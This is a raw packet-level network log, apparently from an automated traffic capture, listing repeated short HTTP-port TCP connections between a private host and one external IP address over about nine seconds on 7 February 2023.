                          Feb 7, 2023 20:04:09.582855940 CET5044380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.641294003 CET805044262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.641560078 CET5044280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.643640041 CET805044362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.643846035 CET5044380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.644629955 CET5044380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.705076933 CET805044362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.708007097 CET805044362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.708178997 CET5044380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.830238104 CET5044380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.831115007 CET5044480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.890990973 CET805044362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.891251087 CET5044380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.891778946 CET805044462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.891916037 CET5044480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.894977093 CET5044480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:09.955832005 CET805044462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.958677053 CET805044462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:09.958779097 CET5044480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.071660995 CET5044480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.072649956 CET5044580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.132551908 CET805044462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.132663965 CET5044480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.135355949 CET805044562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.135508060 CET5044580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.137177944 CET5044580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.199991941 CET805044562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.205051899 CET805044562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.205137014 CET5044580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.321160078 CET5044580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.322185993 CET5044680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.383667946 CET805044662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.383814096 CET5044680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.383912086 CET805044562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.383986950 CET5044580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.384849072 CET5044680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.446382046 CET805044662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.448929071 CET805044662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.449074030 CET5044680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.565285921 CET5044680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.566066027 CET5044780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.627891064 CET805044662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.627935886 CET805044762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.627985001 CET5044680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.628092051 CET5044780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.628545046 CET5044780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.690087080 CET805044762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.692709923 CET805044762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.693794012 CET5044780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.822205067 CET5044780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.823306084 CET5044880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.884013891 CET805044762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.884123087 CET5044780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.884128094 CET805044862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.884268045 CET5044880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.888531923 CET5044880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:10.949146986 CET805044862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.952862978 CET805044862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:10.953119993 CET5044880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.064663887 CET5044880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.065623999 CET5044980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.125417948 CET805044862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.125556946 CET5044880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.126013994 CET805044962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.126128912 CET5044980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.130604029 CET5044980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.191284895 CET805044962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.196962118 CET805044962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.197117090 CET5044980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.318948030 CET5044980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.320137024 CET5045080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.379724979 CET805044962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.380326033 CET805045062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.380486012 CET5044980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.380587101 CET5045080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.381588936 CET5045080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.441893101 CET805045062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.444600105 CET805045062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.446861029 CET5045080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.564209938 CET5045080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.564871073 CET5045180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.624707937 CET805045062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.625396967 CET805045162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.625684977 CET5045080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.625750065 CET5045180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.626761913 CET5045180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.687503099 CET805045162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.690268040 CET805045162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.690438986 CET5045180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.798916101 CET5045180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.799993992 CET5045280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.859649897 CET805045162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.860564947 CET805045262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.860704899 CET5045180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.860821009 CET5045280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.861794949 CET5045280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:11.922384977 CET805045262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.924984932 CET805045262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:11.926865101 CET5045280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.034817934 CET5045280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.036401033 CET5045380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.095712900 CET805045262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.095926046 CET5045280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.096739054 CET805045362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.098993063 CET5045380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.107650042 CET5045380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.167958021 CET805045362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.172580957 CET805045362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.175574064 CET5045380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.284290075 CET5045380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.285304070 CET5045480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.344882965 CET805045362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.345056057 CET5045380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.347606897 CET805045462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.347773075 CET5045480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.348170042 CET5045480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.410872936 CET805045462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.415218115 CET805045462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.415394068 CET5045480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.518747091 CET5045480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.519570112 CET5045580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.579339981 CET805045562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.579492092 CET5045580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.581159115 CET805045462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.581268072 CET5045480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.584651947 CET5045580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.644248962 CET805045562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.648220062 CET805045562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.648376942 CET5045580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.756870985 CET5045580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.757545948 CET5045680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.816560984 CET805045562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.816749096 CET5045580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.816869974 CET805045662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.816998959 CET5045680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.818077087 CET5045680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.877405882 CET805045662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.879952908 CET805045662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:12.880053997 CET5045680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:12.999295950 CET5045680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.000889063 CET5045780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.058826923 CET805045662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.059180021 CET5045680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.063276052 CET805045762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.063541889 CET5045780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.065112114 CET5045780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.127614021 CET805045762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.132714033 CET805045762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.132998943 CET5045780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.237920046 CET5045780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.240746021 CET5045880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.300647020 CET805045762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.300853014 CET5045780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.301112890 CET805045862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.301246881 CET5045880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.302773952 CET5045880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.363301992 CET805045862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.366125107 CET805045862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.366363049 CET5045880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.471354008 CET5045880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.475070000 CET5045980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.531955957 CET805045862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.532080889 CET5045880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.536643982 CET805045962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.536799908 CET5045980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.538197994 CET5045980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.599747896 CET805045962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.602175951 CET805045962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.602288008 CET5045980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.710737944 CET5045980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.711826086 CET5046080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.771632910 CET805046062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.771816015 CET5046080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.772277117 CET805045962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.772289991 CET5046080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.772382975 CET5045980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.831832886 CET805046062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.834223032 CET805046062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:13.834316969 CET5046080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.943460941 CET5046080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:13.944219112 CET5046180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.003144026 CET805046062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.003273010 CET5046080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.004715919 CET805046162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.004858971 CET5046180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.005419970 CET5046180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.066813946 CET805046162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.070334911 CET805046162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.070820093 CET5046180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.190036058 CET5046180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.191133022 CET5046280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.250796080 CET805046262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.250845909 CET805046162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.250925064 CET5046280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.251003027 CET5046180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.252135992 CET5046280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.311691999 CET805046262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.315682888 CET805046262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.316399097 CET5046280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.427612066 CET5046280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.428709984 CET5046380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.487291098 CET805046262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.488073111 CET5046280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.490993977 CET805046362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.491134882 CET5046380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.491802931 CET5046380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.552402020 CET805046362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.555496931 CET805046362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.559381962 CET5046380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.674654007 CET5046380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.675602913 CET5046480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.735440016 CET805046362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.735929012 CET5046380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.737885952 CET805046462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.739190102 CET5046480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.739715099 CET5046480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.802295923 CET805046462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.805259943 CET805046462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.809118986 CET5046480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.924839973 CET5046480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.925709963 CET5046580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.987114906 CET805046562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.987312078 CET805046462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:14.987432003 CET5046480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.987607002 CET5046580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:14.989651918 CET5046580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.051013947 CET805046562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.055737972 CET805046562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.057993889 CET5046580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.174338102 CET5046580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.175327063 CET5046680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.235963106 CET805046562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.237169027 CET5046580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.237633944 CET805046662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.237771034 CET5046680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.238348961 CET5046680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.301014900 CET805046662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.304383993 CET805046662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.307199955 CET5046680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.426089048 CET5046680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.426875114 CET5046780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.488456964 CET805046762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.488502026 CET805046662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.488719940 CET5046680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.491100073 CET5046780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.494808912 CET5046780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.556699991 CET805046762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.559283018 CET805046762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.559433937 CET5046780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.675718069 CET5046780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.681441069 CET5046880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.737427950 CET805046762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.737626076 CET5046780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.742917061 CET805046862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.743094921 CET5046880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.743630886 CET5046880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.805157900 CET805046862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.807982922 CET805046862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:15.808228016 CET5046880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.940296888 CET5046880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:15.941195011 CET5046980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.002141953 CET805046862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.002317905 CET5046880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.003937960 CET805046962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.004097939 CET5046980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.004547119 CET5046980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.068090916 CET805046962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.073323011 CET805046962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.073462963 CET5046980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.192492008 CET5046980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.193370104 CET5047080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.254825115 CET805047062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.255059958 CET5047080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.255316973 CET805046962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.255398035 CET5046980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.255517960 CET5047080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.318300962 CET805047062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.320497990 CET805047062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.320997000 CET5047080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.425079107 CET5047080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.425877094 CET5047180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.486816883 CET805047162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.486850977 CET805047062.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.487005949 CET5047180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.487063885 CET5047080192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.488079071 CET5047180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.549525023 CET805047162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.553069115 CET805047162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.553158045 CET5047180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.658919096 CET5047180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.659679890 CET5047280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.719996929 CET805047162.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.720040083 CET805047262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.720266104 CET5047180192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.720329046 CET5047280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.721903086 CET5047280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.782346010 CET805047262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.785454988 CET805047262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.785629034 CET5047280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.894371033 CET5047280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.895267963 CET5047380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.954879999 CET805047262.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.954979897 CET5047280192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.957114935 CET805047362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:16.957233906 CET5047380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:16.958101034 CET5047380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.019891024 CET805047362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.023379087 CET805047362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.023528099 CET5047380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.146166086 CET5047380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.146877050 CET5047480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.207315922 CET805047462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.207453966 CET5047480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.208177090 CET805047362.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.208272934 CET5047380192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.216226101 CET5047480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.278192043 CET805047462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.282707930 CET805047462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.282841921 CET5047480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.399935961 CET5047480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.400614023 CET5047580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.461833000 CET805047462.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.462872028 CET805047562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.462960958 CET5047480192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.463453054 CET5047580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.464492083 CET5047580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.526176929 CET805047562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.529103041 CET805047562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.530755997 CET5047580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.646625996 CET5047580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.646634102 CET5047680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.708195925 CET805047662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.708472013 CET805047562.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.708655119 CET5047580192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.708966017 CET5047680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.709098101 CET5047680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.770932913 CET805047662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.773282051 CET805047662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.773384094 CET5047680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.880425930 CET5047680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.881256104 CET5047780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.940711021 CET805047762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.940859079 CET5047780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.941982985 CET805047662.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:17.942254066 CET5047680192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:17.942955971 CET5047780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.002701044 CET805047762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.007100105 CET805047762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.007909060 CET5047780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.112782955 CET5047780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.120085955 CET5047880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.172341108 CET805047762.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.173553944 CET5047780192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.181550980 CET805047862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.186763048 CET5047880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.186763048 CET5047880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.248322964 CET805047862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.252865076 CET805047862.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.256989002 CET5047880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.362730980 CET5047880192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.362921000 CET5047980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.422303915 CET805047962.204.41.4192.168.2.6
                          Feb 7, 2023 20:04:18.422533035 CET5047980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.422959089 CET5047980192.168.2.662.204.41.4
                          Feb 7, 2023 20:04:18.424482107 CET805047862.204.41.4192.168.2.6
